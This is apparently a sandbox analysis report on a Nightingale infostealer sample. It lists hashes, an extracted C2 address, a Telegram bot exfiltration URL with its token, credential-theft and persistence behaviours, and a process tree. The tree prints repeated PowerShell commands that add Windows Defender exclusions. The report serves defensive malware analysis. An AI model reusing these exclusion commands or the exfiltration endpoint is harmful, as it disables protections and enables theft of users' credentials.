nightingale | 47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e

Resubmissions

21/07/2024, 23:01

240721-2zth1aygqh 10

21/07/2024, 22:53

240721-2t6w5syepf 10

21/07/2024, 22:42

240721-2mpz2s1bpp 10

14/07/2024, 16:04

240714-thz1fszcna 10

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
14/07/2024, 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Size

144KB
MD5

6945668834c3c7223d4d98e0e89428ec
SHA1

a6d6bf5bdeb785c35e6fbec7d5464887076fcf4c
SHA256

47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e
SHA512

4695251deb6f4f4a87d13a8a714907ba309820904298765344531a5c655d97fbcd4b5df95ec5d0a2d1a03256115bffed074a77a17f6b8c8c3e727b26f1b1617e
SSDEEP

3072:9DLhghNC38S7gzQ/cVD4U7p82jMU0Lt/w/HOWJbG5vcX++kwEKEAW31D4:2zQ/L6Mbw/uWJbGF+REKA1

Score

10^/10

nightingale execution persistence spyware stealer

Malware Config

Extracted

Family

nightingale

80.76.49.148:3999

https://api.telegram.org/bot6813766312:AAGyxmK0E-SiPNsQCpjEIFZJIOhZnrPLxhw/sendMessage?chat_id=6467170572

Signatures

Nightingale stealer
Nightingale stealer is an information stealer written in C#.
stealer nightingale

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2652	powershell.exe
2972	powershell.exe
1644	powershell.exe
2476	powershell.exe
2088	powershell.exe
1780	powershell.exe
2080	powershell.exe
340	powershell.exe
1356	powershell.exe
1616	powershell.exe
2492	powershell.exe
2052	powershell.exe
2960	powershell.exe
348	powershell.exe
1212	powershell.exe
2268	powershell.exe
1660	powershell.exe
2136	powershell.exe
2260	powershell.exe
736	powershell.exe
1656	powershell.exe
2376	powershell.exe
2524	powershell.exe
2940	powershell.exe
1880	powershell.exe
316	powershell.exe
868	powershell.exe
2440	powershell.exe
916	powershell.exe
784	powershell.exe
2816	powershell.exe
2900	powershell.exe
2052	powershell.exe
2856	powershell.exe
2988	powershell.exe
1052	powershell.exe
2164	powershell.exe
2344	powershell.exe
2292	powershell.exe
2464	powershell.exe
2768	powershell.exe
2328	powershell.exe
1044	powershell.exe
1972	powershell.exe
1612	powershell.exe
348	powershell.exe
1436	powershell.exe
2328	powershell.exe
2152	powershell.exe
1428	powershell.exe
2336	powershell.exe
2848	powershell.exe
1048	powershell.exe
2768	powershell.exe
2712	powershell.exe
1764	powershell.exe
1780	powershell.exe
2704	powershell.exe
2292	powershell.exe
1652	powershell.exe
1532	powershell.exe
2732	powershell.exe
2704	powershell.exe
2044	powershell.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe"	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2988	powershell.exe
1872	powershell.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
2044	powershell.exe
1044	powershell.exe
568	powershell.exe
2848	powershell.exe
840	powershell.exe
1864	powershell.exe
340	powershell.exe
1656	powershell.exe
3020	powershell.exe
2652	powershell.exe
2036	powershell.exe
1980	powershell.exe
772	powershell.exe
2376	powershell.exe
784	powershell.exe
2108	powershell.exe
2400	powershell.exe
540	powershell.exe
348	powershell.exe
1048	powershell.exe
2432	powershell.exe
1940	powershell.exe
1356	powershell.exe
2336	powershell.exe
1248	powershell.exe
2388	powershell.exe
1052	powershell.exe
1436	powershell.exe
2628	powershell.exe
2972	powershell.exe
1868	powershell.exe
1616	powershell.exe
2816	powershell.exe
2604	powershell.exe
728	powershell.exe
2900	powershell.exe
2440	powershell.exe
2088	powershell.exe
2960	powershell.exe
2524	powershell.exe
1780	powershell.exe
2260	powershell.exe
1972	powershell.exe
1532	powershell.exe
2136	powershell.exe
2080	powershell.exe
2712	powershell.exe
2052	powershell.exe
348	powershell.exe
2704	powershell.exe
1844	powershell.exe
1940	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2992	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	30
PID 2060 wrote to memory of 2992	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	30
PID 2060 wrote to memory of 2992	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	30
PID 2060 wrote to memory of 348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	31
PID 2060 wrote to memory of 348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	31
PID 2060 wrote to memory of 348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	31
PID 348 wrote to memory of 2988	348	cmd.exe	34
PID 348 wrote to memory of 2988	348	cmd.exe	34
PID 348 wrote to memory of 2988	348	cmd.exe	34
PID 2992 wrote to memory of 1872	2992	cmd.exe	35
PID 2992 wrote to memory of 1872	2992	cmd.exe	35
PID 2992 wrote to memory of 1872	2992	cmd.exe	35
PID 2060 wrote to memory of 1348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	39
PID 2060 wrote to memory of 1348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	39
PID 2060 wrote to memory of 1348	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	39
PID 2060 wrote to memory of 2004	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	41
PID 2060 wrote to memory of 2004	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	41
PID 2060 wrote to memory of 2004	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	41
PID 1348 wrote to memory of 1044	1348	cmd.exe	43
PID 1348 wrote to memory of 1044	1348	cmd.exe	43
PID 1348 wrote to memory of 1044	1348	cmd.exe	43
PID 2004 wrote to memory of 2044	2004	cmd.exe	44
PID 2004 wrote to memory of 2044	2004	cmd.exe	44
PID 2004 wrote to memory of 2044	2004	cmd.exe	44
PID 2060 wrote to memory of 1676	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	45
PID 2060 wrote to memory of 1676	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	45
PID 2060 wrote to memory of 1676	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	45
PID 2060 wrote to memory of 1212	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	47
PID 2060 wrote to memory of 1212	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	47
PID 2060 wrote to memory of 1212	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	47
PID 1676 wrote to memory of 568	1676	cmd.exe	49
PID 1676 wrote to memory of 568	1676	cmd.exe	49
PID 1676 wrote to memory of 568	1676	cmd.exe	49
PID 1212 wrote to memory of 2848	1212	cmd.exe	50
PID 1212 wrote to memory of 2848	1212	cmd.exe	50
PID 1212 wrote to memory of 2848	1212	cmd.exe	50
PID 2060 wrote to memory of 740	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	51
PID 2060 wrote to memory of 740	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	51
PID 2060 wrote to memory of 740	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	51
PID 2060 wrote to memory of 956	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	53
PID 2060 wrote to memory of 956	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	53
PID 2060 wrote to memory of 956	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	53
PID 740 wrote to memory of 1864	740	cmd.exe	55
PID 740 wrote to memory of 1864	740	cmd.exe	55
PID 740 wrote to memory of 1864	740	cmd.exe	55
PID 956 wrote to memory of 840	956	cmd.exe	56
PID 956 wrote to memory of 840	956	cmd.exe	56
PID 956 wrote to memory of 840	956	cmd.exe	56
PID 2060 wrote to memory of 1492	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	57
PID 2060 wrote to memory of 1492	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	57
PID 2060 wrote to memory of 1492	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	57
PID 2060 wrote to memory of 2080	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	59
PID 2060 wrote to memory of 2080	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	59
PID 2060 wrote to memory of 2080	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	59
PID 1492 wrote to memory of 340	1492	cmd.exe	61
PID 1492 wrote to memory of 340	1492	cmd.exe	61
PID 1492 wrote to memory of 340	1492	cmd.exe	61
PID 2080 wrote to memory of 1656	2080	cmd.exe	62
PID 2080 wrote to memory of 1656	2080	cmd.exe	62
PID 2080 wrote to memory of 1656	2080	cmd.exe	62
PID 2060 wrote to memory of 2852	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	63
PID 2060 wrote to memory of 2852	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	63
PID 2060 wrote to memory of 2852	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	63
PID 2060 wrote to memory of 2464	2060	47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe	65

C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
"C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe"
1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:3064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:3036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
